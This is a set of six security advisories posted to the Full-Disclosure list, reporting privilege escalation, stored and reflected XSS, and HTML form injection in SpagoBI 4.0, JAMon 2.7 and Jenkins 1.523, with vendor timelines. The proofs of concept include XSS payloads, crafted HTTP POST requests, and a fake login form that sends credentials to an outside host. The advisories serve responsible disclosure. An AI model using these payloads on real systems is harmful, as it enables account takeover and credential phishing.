[Full-disclosure] [CVE-2013-6231] Remote Privilege Escalation in SpagoBI v4.0
### 01. ### Advisory Information ### Title: Remote Privilege Escalation in SpagoBI Date published: 2013-02-28 Date of last update: 2013-02-28 Vendors contacted: Engineering Group Discovered by: Christian Catalano Severity: High 02. ### Vulnerability Information ### CVE reference: CVE-2013-6231 CVSS v2 Base Score: 9 CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C) Component/s: SpagoBI Class: Input Manipulation 03. ### Introduction ### SpagoBI[1] is an Open Source Business Intelligence suite, belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics.[3] SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an independent open-source software community. [1] - http://www.spagobi.org [2] - http://www.eng.it [3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 [4] - http://forge.ow2.org/projects/spagobi 04. ### Vulnerability Description ### SpagoBI contains a flaw that leads to unauthorized privileges being gained. The issue is triggered when the servlet (action): AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION is executed with specifically crafted input, and may allow a remote attacker to gain Administrator role privileges. 05. ### Technical Description / Proof of Concept Code ### An attacker (a SpagoBI malicious Business User with RSM role ) can invoke via URL the servlet (action): AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION to gain SpagoBI Administrator privilege. To reproduce the vulnerability follow the provided information and steps below: - Using a browser log on to SpagoBI with restricted account (e.g. Business User Account) - Execute: https://localhost/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION - Select your account from Users List - Select Administrator Role from Roles tab and save it Remote Privilege Escalation Attack has been successfully completed! 06. ### Business Impact ### Successful exploitation of the vulnerability may allow a remote, authenticated attacker to elevate privileges and obtain full access to the affected system. The attacker could exploit the vulnerability to become administrator and retrieve or publish any kind of data. 07. ### Systems Affected ### This vulnerability was tested against: SpagoBI 4.0 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### This issue is fixed in SpagoBI v4.1, which can be downloaded from: http://forge.ow2.org/project/showfiles.php?group_id=204 Fixed by vendor [verified] 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 08th, 2013: Vulnerability identification October 22th, 2013: Vendor notification to [SpagoBI Team] November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] January 16th, 2014: Fix/Patch Verified February 28th, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-6232] Persistent Cross-Site Scripting (XSS) in SpagoBI v4.0
### 01. ### Advisory Information ### Title: Persistent Cross-Site Scripting (XSS) in SpagoBI Date published: 2014-03-01 Date of last update: 2014-03-01 Vendors contacted: Engineering Group Discovered by: Christian Catalano Severity: High 02. ### Vulnerability Information ### CVE reference: CVE-2013-6232 CVSS v2 Base Score: 4 CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N) Component/s: SpagoBI Class: Input Manipulation 03. ### Introduction ### SpagoBI[1] is an Open Source Business Intelligence suite, belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics. [3]SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an independent open-source software community. [1] - http://www.spagobi.org [2] - http://www.eng.it [3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 [4] - http://forge.ow2.org/projects/spagobi 04. ### Vulnerability Description ### SpagoBI contains a flaw that allows persistent cross-site scripting (XSS) attacks. This flaw exists because the application does not validate certain unspecified input before returning it to the user. This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server. 05. ### Technical Description / Proof of Concept Code ### In execution page can be visible a toolbar with various icons useful for the user to perform actions related to the document runs. The user can insert a note about the executed document. The note is associated to the document with relative parameters value and to the user. It can be public or private, so public notes are visible to all users while the private notes are visible only from the user creator. An attacker (a SpagoBI malicious user with a restricted account ) can insert a note with jasvascript code: object data=javascript:alert('XSS')/object and save it in public mode. The code execution happens when the victim (an unaware user) click on annotate document detail. This is not the only way to add malicious code in the SpagoBI web app. 06. ### Business Impact ### Exploitation of the vulnerability requires low privileged application user account but low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, client-side phishing, client-side external redirects or malware loads and client-side manipulation of the vulnerable module context. 07. ### Systems Affected ### This vulnerability was tested against: SpagoBI 4.0 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### This issue is fixed in SpagoBI v4.1, which can be downloaded from: http://forge.ow2.org/project/showfiles.php?group_id=204 Fixed by vendor [verified] 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 08th, 2013: Vulnerability identification October 22th, 2013: Vendor notification to [SpagoBI Team] November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] January 16th, 2014: Fix/Patch Verified March01st, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-6233] Persistent HTML Script Insertion permits offsite-bound forms in SpagoBI v4.0
### 01. ### Advisory Information ### Title: Persistent HTML Script Insertion permits offsite-bound forms Date published: 2014-03-01 Date of last update: 2014-03-01 Vendors contacted: Engineering Group Discovered by: Christian Catalano Severity: Medium 02. ### Vulnerability Information ### CVE reference: CVE-2013-6233 CVSS v2 Base Score: 4 CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N) Component/s: SpagoBI Class: Input Manipulation 03. ### Introduction ### SpagoBI[1] is an Open Source Business Intelligence suite, belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics. [3]SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an independent open-source software community. [1] - http://www.spagobi.org [2] - http://www.eng.it [3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 [4] - http://forge.ow2.org/projects/spagobi 04. ### Vulnerability Description ### SpagoBI contains a flaw that allows persistent script insertion. This may allow a remote attacker to inject HTML code including forms that load on a remote site, which can allow the attacker to conduct a phishing attack on a user and capture their credentials. 05. ### Technical Description / Proof of Concept Code ### The vulnerability is located in some SpagoBI input fields (e.g.'Description' input field from 'Short document metadata') To reproduce the vulnerability, the attacker (a malicious user) can add the malicious HTML script code: form method=POST action=http://www.mocksite.org/login/login.php.; Username: input type=text name=username size=15 /br / Password: input type=password name=passwort size=15 /br / div align=center pinput type=submit value=Login //p /div /form in 'Description' input field from 'Short document metadata' and click on save button. The code execution happens when the victim (an unaware user) click on 'Short document metadata'. This is not the only way to inject malicious HTML code in the SpagoBI web app. 06. ### Business Impact ### Exploitation of the vulnerability requires low privileged application user account but low or medium user interaction. Successful exploitation of the vulnerability results in persistent phishing and persistent external redirects. 07. ### Systems Affected ### This vulnerability was tested against: SpagoBI 4.0 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### This issue is fixed in SpagoBI v4.1, which can be downloaded from: http://forge.ow2.org/project/showfiles.php?group_id=204 Fixed by vendor [verified] 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 08th, 2013: Vulnerability identification October 22th, 2013: Vendor notification to [SpagoBI Team] November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] January 16th, 2014: Fix/Patch Verified March01st, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-6234] XSS File Upload in SpagoBI v4.0
### 01. ### Advisory Information ### Title: XSS File Upload Date published: 2014-03-01 Date of last update: 2014-03-01 Vendors contacted: Engineering Group Discovered by: Christian Catalano Severity: Medium 02. ### Vulnerability Information ### CVE reference: CVE-2013-6234 CVSS v2 Base Score: 4 CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N) Component/s: SpagoBI Class: Input Manipulation 03. ### Introduction ### SpagoBI[1] is an Open Source Business Intelligence suite, belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics. [3]SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an independent open-source software community. [1] - http://www.spagobi.org [2] - http://www.eng.it [3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 [4] - http://forge.ow2.org/projects/spagobi 04. ### Vulnerability Description ### SpagoBI contains a flaw that may allow a remote attacker to execute arbitrary code. This flaw exists because the application does not restrict uploading for specific file types from Worksheet designer function. This may allow a remote attacker to upload arbitrary files (e.g. .html for XSS) that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server or more easily conduct more serious attacks. 05. ### Technical Description / Proof of Concept Code ### An attacker (a SpagoBI malicious user with a restricted account) can upload a file from Worksheet designer function. To reproduce the vulnerability follow the provided information and steps below: - Using a browser log on to SpagoBI with restricted account (e.g. Business User Account) - Go on: Worksheet designer function - Click on: Image and Choose image - Upload malicious file and save it XSS Malicious File Upload Attack has been successfully completed! More details about SpagoBI Worksheet Engine and Worksheet designer http://wiki.spagobi.org/xwiki/bin/view/spagobi_server/Worksheet#HWorksheetoverview (e.g. Malicious File: xss.html) !DOCTYPE html html head script function myFunction() {alert(XSS);} /script /head body input type=button onclick=myFunction() value=Show alert box /body /html 06. ### Business Impact ### Exploitation of the vulnerability requires low privileged application user account but low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, client-side phishing, client-side external redirects or malware loads and client-side manipulation of the vulnerable module context. 07. ### Systems Affected ### This vulnerability was tested against: SpagoBI 4.0 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### This issue is fixed in SpagoBI v4.1, which can be downloaded from: http://forge.ow2.org/project/showfiles.php?group_id=204 Fixed by vendor [verified] 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 09th, 2013: Vulnerability identification October 22th, 2013: Vendor notification to [SpagoBI Team] November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] January 16th, 2014: Fix/Patch Verified March01st, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7
### 01. ### Advisory Information ### Title: Multiple Reflected XSS vulnerabilities in JAMon Date published: 2013-01-23 Date of last update: 2013-01-23 Vendors contacted: JAMon v 2.7 Discovered by: Christian Catalano Severity: Low 02. ### Vulnerability Information ### CVE reference: CVE-2013-6235 CVSS v2 Base Score: 4.3 CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) Component/s: JAMon v 2.7 Class: Input Manipulation 03. ### Introduction ### The Java Application Monitor (JAMon) is a free, simple, high performance, thread safe, Java API that allows developers to easily monitor production applications. http://jamonapi.sourceforge.net 04. ### Vulnerability Description ### Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been identified in the JAMon web application. JAMon contains a flaw that allows multiple reflected cross-site scripting (XSS) attacks. This flaw exists because certain pages do not validate input before returning it to users. +--+---+ |-Vulnerable module(s)andparameter(s)--| +--+---+ |mondetail.jsp ArraySQL| |mondetail.jsp listenertype| |mondetail.jsp currentlistener-| |jamonadmin.jsp ---ArraySQL| |sql.jsp---ArraySQL| |exceptions.jspArraySQL| +--+---+ 05. ### Technical Description / Proof of Concept Code ### 05.01) Malicious Request (ArraySQL parameter): The vulnerability is located in the ' Filter (optional) ' input field upon submission to the pages http://localhost/jamon/mondetail.jsp http://localhost/jamon/ jamonadmin.jsp http://localhost/jamon/ sql.jsp http://localhost/jamon/ exceptions.jsp The application does not validate the 'ArraySQL' parameter upon submission to the *.jsp scripts. The attacker can inject the malicious javascript code: 1--1ScRiPt alert('XSS')/ScRiPt!-- in the ' Filter (optional) ' input field and click on GO! button. 05.02) Malicious Request (listenertype parameter) POST /jamon/mondetail.jsp HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/jamon/mondetail.jsp Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 209 listenertype=1--1ScRiPtalert('XSS')/ScRiPt!--currentlistener=JAMonBufferListeneroutputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21 05.03) Malicious Request (currentlistener parameter) POST /jamon/mondetail.jsp HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/jamon/mondetail.jsp Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 195 listenertype=valuecurrentlistener=1--1ScRiPtalert('XSS')/ScRiPt!--outputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21 06. ### Business Impact ### This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server. 07. ### Systems Affected ### This vulnerability was tested against: JAMon v2.7 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### Currently, there are no known upgrades or patches to correct this vulnerability. 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### October 18th, 2013: Vulnerability identification October 22th, 2013: Vendor notification [JAMon] December 10th, 2013: Vulnerability confirmation [JAMonI] January 23th, 2014: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure
[Full-disclosure] [CVE-2013-5573] Jenkins v1.523 Default markup formatter permits offsite-bound forms
### 01. ### Advisory Information ### Title: Default markup formatter permits offsite-bound forms Date published : 2013-12-16 Date of last update: 2013-12-16 Vendors contacted : Jenkins CI v 1.523 Discovered by: Christian Catalano Severity: Low 02. ### Vulnerability Information ### CVE reference: CVE-2013-5573 CVSS v2 Base Score: 4.7 CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N) Component/s : Jenkins CI v 1.523 Class : HTML Injection 03. ### Introduction ### Jenkins CI is an extendable open source continuous integration server http://jenkins-ci.org. 04. ### Vulnerability Description ### The default installation and configuration of Jenkins CI is prone to a security vulnerability. The Jenkins CI default markup formatter permits offsite-bound forms. This vulnerability could be exploited by a remote attacker (a malicious user) to inject malicious persistent HTML script code (application side). 05. ### Technical Description / Proof of Concept Code ### The vulnerability is located in the 'Descriotion' input field of the User Configuration function: https://localhost:9444/jenkins/user/attacker/configure To reproduce the vulnerability, the attacker (a malicious user) can add the malicious HTML script code: form method=POST action=http://www.mocksite.org/login/login.php.; Username: input type=text name=username size=15 /br / Password: input type=password name=passwort size=15 /br / div align=center pinput type=submit value=Login //p /div /form in the 'Descriotion' input field and click on save button. The code execution happens when the victim (an unaware user) view the 'People List' https://localhost:9444/jenkins/asynchPeople/ and click on attacker user id. 06. ### Business Impact ### Exploitation of the persistent web vulnerability requires a low privilege web application user account. Successful exploitation of the vulnerability results in persistent phishing and persistent external redirects. 07. ### Systems Affected ### This vulnerability was tested against: Jenkins CI v1.523 Older versions are probably affected too, but they were not checked. 08. ### Vendor Information, Solutions and Workarounds ### Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily mitigate the flaw by implementing the following workaround: 'MyspacePolicy' permits tag(form, action, ONSITE_OR_OFFSITE_URL, method); Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or perhaps form could be banned entirely. 09. ### Credits ### This vulnerability has been discovered by: Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com 10. ### Vulnerability History ### August 21th, 2013: Vulnerability identification August4th, 2013: Vendor notification [Jenkins CI] November 19th, 2013: Vulnerability confirmation [Jenkins CI] November 19th, 2013: Vendor Solution December 16th, 2013: Vulnerability disclosure 11. ### Disclaimer ### The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/